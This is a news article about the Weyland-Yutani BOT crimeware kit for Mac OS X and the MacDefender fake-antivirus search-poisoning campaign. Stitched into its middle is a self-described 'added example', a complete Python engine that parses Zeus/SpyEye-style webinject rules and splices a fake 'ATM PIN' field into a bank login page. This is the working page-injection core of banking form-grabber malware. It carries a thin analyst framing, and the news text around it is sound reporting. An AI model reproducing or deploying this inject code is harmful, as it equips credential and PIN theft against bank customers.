Mac OS X Hit By Crimeware Kit, SEO Poisoning Attack

Apple’s Mac OS X is being targeted by a search engine poisoning attack and the first Mac-compatible crimeware kit

Danish security firm CSIS Security Group said on Monday that it has identified what it believes is the first DIY crimeware kit aimed at the Mac OS X platform.

In addition, a massive search-engine-based attack using search terms related to topics such as global warming and the death of Osama bin Laden is targeting Mac as well as Windows users, according to Sophos. Both incidents are a sign of Apple software’s growing importance, security researchers said.

Cautious release

CSIS said the crimeware kit, called Weyland-Yutani BOT, has been announced so far on a few “closed underground forums”.

“Detailed information about this crimeware kit is not being leaked publicly and the authors of the kit are obviously trying to stay below the radar, allowing only vetted users of the forums to see most of the content,” said CSIS’s Peter Kruse in a blog post.

Crimeware kits are used to build malware that grabs passwords and other sensitive information; notorious examples include Zeus and SpyEye. Kruse said Weyland-Yutani BOT is a “form grabber” which, like similar kits designed for Windows, consists of a builder and an admin panel and supports encryption.

“Apparently, a dedicated iPad and Linux release are under preparation as well,” Kruse stated. “The Weyland-Yutani BOT supports web injects and form grabbing in Firefox; however, both Chrome and Safari will soon follow. The webinject templates are identical to the ones used in Zeus and SpyEye.”
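To make concrete what “web injects” driven by Zeus-style templates mean in practice, here is an added example; it is not code from CSIS, from the kit, or from this article. It parses the publicly documented Zeus/SpyEye webinject layout (set_url, data_before, data_inject, data_after, data_end) and splices the injected HTML into a constructed login page, which is exactly what a form-grabbing bot does between the server response and the browser rendering it. The site bank.example, the sample rule, the field names and the G/P method flags are assumptions made for illustration, and an analyst triaging a captured config can use the same parser to list which URLs and fields a sample targets.

```python
import re
from fnmatch import fnmatch

# Constructed sample rule in the publicly documented Zeus/SpyEye webinject
# layout (assumption: the article says the kit's templates match those but
# does not reproduce them). '*' is a wildcard in the URL and in the HTML
# patterns; the flags after the URL select the request method (G = GET,
# P = POST), following the Zeus convention.
SAMPLE_INJECTS = """\
set_url https://bank.example/login* GP
data_before
<input*name="password"*>
data_end
data_inject
<br/>ATM PIN: <input type="text" name="atm_pin"/>
data_end
data_after
data_end
"""

# Constructed victim page; bank.example is not a real site.
SAMPLE_PAGE = """\
<html><body><form action="/login" method="post">
User: <input type="text" name="user"/>
Pass: <input type="password" name="password"/>
<input type="submit" value="Log in"/>
</form></body></html>
"""

SECTIONS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text):
    """Parse a webinject file into a list of rules.

    Each rule is a dict with 'url', 'flags' and the three data_* sections.
    A section body runs from its keyword line to the next 'data_end'.
    """
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url"):
            parts = line.split(None, 2)
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            rules.append(current)
        elif line in SECTIONS:
            section, buf = line, []
        elif line == "data_end":
            if current is not None and section is not None:
                current[section] = "\n".join(buf)
            section, buf = None, []
        elif section is not None:
            buf.append(line)
    return rules


def _wild_to_regex(pattern):
    """Translate a pattern with '*' wildcards into a non-greedy regex."""
    return ".*?".join(re.escape(part) for part in pattern.split("*"))


def apply_webinjects(url, method, html, rules):
    """Splice every matching rule's data_inject into html.

    Returns (modified_html, number_of_rules_applied). A rule matches when the
    URL wildcard and the method flag match; the injected HTML goes after the
    data_before match and before the data_after match (or directly after
    data_before when data_after is empty).
    """
    applied = 0
    for rule in rules:
        if not fnmatch(url, rule["url"]) or method[:1].upper() not in rule["flags"].upper():
            continue
        before = re.search(_wild_to_regex(rule["data_before"]), html, re.S)
        if before is None:
            continue
        pos = before.end()
        if rule["data_after"]:
            after = re.search(_wild_to_regex(rule["data_after"]), html[pos:], re.S)
            if after is None:
                continue
            pos += after.start()
        html = html[:pos] + rule["data_inject"] + html[pos:]
        applied += 1
    return html, applied


def find_injected_fields(original, modified):
    """Analyst-side check: input names present in modified but not in original."""
    def names(h):
        return set(re.findall(r'<input[^>]*name="([^"]+)"', h))
    return sorted(names(modified) - names(original))


if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_INJECTS)
    page, n = apply_webinjects("https://bank.example/login?ts=1", "GET", SAMPLE_PAGE, rules)
    print(f"{n} inject(s) applied; new fields: {find_injected_fields(SAMPLE_PAGE, page)}")
    print(page)
```

Comparing the page a victim's browser would render against the page the server actually sent, as find_injected_fields does, is the same diff a bank's fraud team or a malware analyst performs to spot an injected “ATM PIN” field that the real site never asks for.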

CSIS said it has videos demonstrating the admin panel and builder, which show that the software appears to be fully operational. The kit sells for 1,000 units of WebMoney, an online payment system operated by WM Transfer Ltd.

Kruse said the existence of the crimeware kit demonstrates that more malware is on the way for Mac OS X and iOS, and that it could catch users of those systems off guard.

“CSIS finds this crimekit to be quite disturbing news since MacOS previously to some degree has been spared from the increasing amount of malware which has haunted Windows-based systems for years,” Kruse wrote. “This could have resulted in a false sense of security that might make Mac OS users especially vulnerable to a sudden and highly sophisticated attack.”

SEO poisoning

Meanwhile, the “massive” search engine poisoning attack serves fake antivirus programs to its victims, delivering payloads onto Mac OS X systems, according to a Sophos blog post.

The attack relies on social engineering: it tries to convince users that a scan of their system has uncovered a serious infection, so that they will install the fake antivirus software, Sophos said.

“In a similar social engineering trick as we have seen in Windows fake scanners, it pretends to be a legitimate Mac anti-virus program called MacDefender,” wrote Sophos’ Chester Wisniewski.

“It uses a lot of social engineering including redirecting your browser to rather offensive porn sites, although it does not appear they are doing this to make money, simply to imply that you are infected. It also uses scare tactics like your credit card data being at risk. The reality is that your credit card is only at risk if you actually try to purchase the fake software,” Wisniewski wrote.